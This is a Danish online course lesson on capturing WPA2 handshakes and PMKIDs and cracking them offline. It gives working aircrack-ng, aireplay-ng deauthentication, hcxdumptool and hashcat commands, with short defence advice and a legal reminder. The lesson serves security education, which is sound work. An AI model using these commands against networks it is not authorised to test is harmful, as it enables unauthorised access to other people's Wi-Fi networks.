Opsamling og knækning af WPA2-handshakes
Opsaml et 4-vejs-handshake med aircrack-ng, og forsøg på ordbogsangreb med Hashcat.
Opsamling og knækning af WPA2-handshakes er en gratis Cyber Security Academy-lektion på CoddyKit. Dette er lektion 2 af 4. Du kan læse alle 3 lektioner i dette læringsspor gratis i deres fulde længde — derefter låser CoddyKit PRO alle lektioner op samt praktiske øvelser med en indbygget kodeeditor og en AI-underviser døgnet rundt. Den er en del af læringsforløbet i Cyber Security Academy, og dine fremskridt synkroniseres på tværs af nettet og CoddyKit-appen. Cyber Security Academy-kurset indeholder 4 lektioner i alt.
Det firevejs håndtryk
Når en klient opretter forbindelse til et WPA2-netværk, udleder det firevejs håndtryk den parvise midlertidige nøgle (PTK) fra PMK'en (som er udledt af PSK'en) og tilfældige noncer. Hvis du opsnapper dette håndtryk, kan du knække adgangskoden offline.
Opsætning af monitoreringstilstand
Monitoreringstilstand gør det muligt for det trådløse kort at opfange alle rammer uanset destination, hvilket er nødvendigt for passiv opsamling af håndtryk. Det virker kun med kort, der understøtter monitoreringstilstand.
# Check wireless interface
iwconfig
# Enable monitor mode
sudo airmon-ng start wlan0
# Creates: wlan0mon
# Kill interfering processes first:
sudo airmon-ng check killPassiv opsamling af håndtryk
Airodump-ng opfanger rammer passivt. Vent på, at en klient opretter forbindelse af sig selv, eller fremtving en ny forbindelse ved hjælp af deautentificering. Opsamling af håndtrykket vises øverst til højre i airodump-outputtet.
# Scan for networks
sudo airodump-ng wlan0mon
# Target a specific AP (replace values)
sudo airodump-ng -c 6 \
--bssid AA:BB:CC:DD:EE:FF \
-w handshake_capture \
wlan0mon
# Top right shows: WPA handshake: AA:BB:...Deautentificeringsangreb
Hvis du sender forfalskede deautentificeringsrammer, tvinger du tilsluttede klienter til at afbryde forbindelsen og oprette den igen, hvilket udløser opsamling af et nyt håndtryk. Det støjer på netværket, kan opdages og kræver, at klienten er inden for rækkevidde.
# Send deauth frames (authorized labs only)
sudo aireplay-ng -0 5 \
-a AA:BB:CC:DD:EE:FF \
-c CC:DD:EE:FF:00:11 \
wlan0mon
# -0 5 = send 5 deauth frames
# -a = AP MAC
# -c = client MAC (or omit for broadcast)PMKID-angreb: Ingen klient nødvendig
PMKID-angrebet (hcxdumptool) opsamler PMKID fra beacon- og probingsrammer uden at kræve en tilsluttet klient. Det er hurtigere at udføre og kan knækkes lige så let som et komplet håndtryk.
# Capture PMKID
hcxdumptool -i wlan0mon --enable_status=1 \
-o pmkid.pcapng
# Convert for Hashcat
hcxpcapngtool -o hash.hc22000 pmkid.pcapng
# Crack with Hashcat mode 22000
hashcat -m 22000 hash.hc22000 rockyou.txtKnækning af håndtrykket med Hashcat
Konvertér opsamlingsfilen, og udfør angrebet med Hashcat-tilstand 22000 (WPA2's samlede format) eller tilstand 2500 (ældre format). Brug rockyou.txt sammen med regelsæt for at opnå de bedste resultater.
# Convert pcap to Hashcat format
hcxpcapngtool -o hash.hc22000 handshake_capture-01.cap
# Crack with dictionary
hashcat -m 22000 hash.hc22000 rockyou.txt
# With rules
hashcat -m 22000 hash.hc22000 rockyou.txt -r best64.rule
# Brute force (short passwords)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?dKnækning med Aircrack-ng
Aircrack-ng udfører CPU-baseret WPA2-knækning direkte fra opsamlingsfilen. Det er langsommere end GPU-baseret knækning med Hashcat, men kræver ingen formatkonvertering.
# Crack with aircrack-ng
aircrack-ng -w rockyou.txt handshake_capture-01.cap
# With multiple wordlists:
aircrack-ng -w wordlist1.txt,wordlist2.txt capture-01.capStrategi for ordlister
Succes med WPA2-knækning afhænger fuldstændigt af ordlistens kvalitet. Brug rockyou.txt som grundlag, Hashcat-regelsæt til variationer, virksomhedsspecifikke ordlister (navn+år+symbol) og målrettede lister baseret på OSINT.
Den praktiske knækningstid
En tilfældig WPA2-adgangskode på 20 tegn eller mere er beregningsmæssigt urealistisk at knække. Knækning er kun praktisk mod korte adgangskoder eller adgangskoder baseret på ordbøger. Derfor er adgangskodens længde og tilfældighed vigtigere end regler for kompleksitet.
Forsvar
Brug WPA3-SAE, som er modstandsdygtigt over for offline-ordbogsangreb, eller WPA2 med en tilfældig adgangssætning på 20 tegn eller mere samt WPA2-Enterprise med EAP-TLS (certifikater i stedet for adgangskoder).
Juridisk påmindelse
Det er ulovligt at opsamle WPA2-håndtryk på netværk, du ikke ejer. Alle teknikker her gælder kun for dine egne testnetværk eller autoriserede laboratoriemiljøer (f.eks. et hjemmelaboratorium eller et dedikeret testadgangspunkt).
Hurtig kontrol
Hvilken fordel giver PMKID-angrebet sammenlignet med standardopsamling af håndtryk?
Opsummering: WPA2-knækning
Opsamling af et WPA2-håndtryk eller en PMKID omdanner Wi-Fi-knækning til et offline-ordbogsangreb. Succes afhænger fuldstændigt af adgangskodens styrke – korte adgangskoder og adgangskoder baseret på ordbøger knækkes hurtigt, mens lange, tilfældige adgangskoder i praksis ikke kan knækkes. Forsvar dig med WPA3-SAE, stærke adgangssætninger og WPA2-Enterprise på virksomhedsnetværk.
Lær Cyber Security Academy med en AI-underviser — gratis
Skriv og kør rigtig kode i din browser, få øjeblikkelig hjælp fra en AI-underviser døgnet rundt, og fortsæt, hvor du slap, på web eller i appen.
- Kurser
- 76
- Lektioner
- 303
Ofte stillede spørgsmål
Er lektionen “Opsamling og knækning af WPA2-handshakes” gratis?
Ja — alle 3 lektioner i læringssporet Cyber Security Academy, inklusive “Opsamling og knækning af WPA2-handshakes”, kan læses gratis i deres fulde længde her på webstedet. Derefter låser CoddyKit PRO alle lektioner op samt interaktive øvelser med en indbygget kodeeditor og en AI-underviser døgnet rundt. Cyber Security Academy-kurset indeholder 4 lektioner i alt.
Hvad lærer jeg i “Opsamling og knækning af WPA2-handshakes”?
Opsaml et 4-vejs-handshake med aircrack-ng, og forsøg på ordbogsangreb med Hashcat. Du øver dig i Cyber Security Academy med praktisk kode, som du kører direkte i browseren, og en AI-vejleder døgnet rundt besvarer dine spørgsmål, mens du arbejder dig gennem lektionen.
Skal jeg have erfaring for at begynde på Cyber Security Academy?
Der kræves ingen tidligere erfaring. Cyber Security Academy på CoddyKit er tilrettelagt for både begyndere og øvede, så du kan starte her eller fra begyndelsen og lære i dit eget tempo. Dette er lektion 2 af 4.
Hvor lang tid tager lektionen “Opsamling og knækning af WPA2-handshakes”?
De fleste CoddyKit-lektioner tager cirka 5–10 minutter. Hver lektion er kort og interaktiv, så du gør løbende fremskridt og kan fortsætte, hvor du slap – på både web og app.
Kan jeg skrive og køre kode i denne Cyber Security Academy-lektion?
Ja. Alle Cyber Security Academy-lektioner har en indbygget kodeeditor, så du kan skrive og køre rigtig kode direkte i din browser og få øjeblikkelig feedback fra AI – uden lokal opsætning.
Alle lektioner i dette kursus
- 802.11-sikkerhedsprotokoller: WEP, WPA2, WPA3
- Opsamling og knækning af WPA2-handshakes
- Evil Twin- og captive portal-angreb
- Enterprise-Wi-Fi: EAP og RADIUS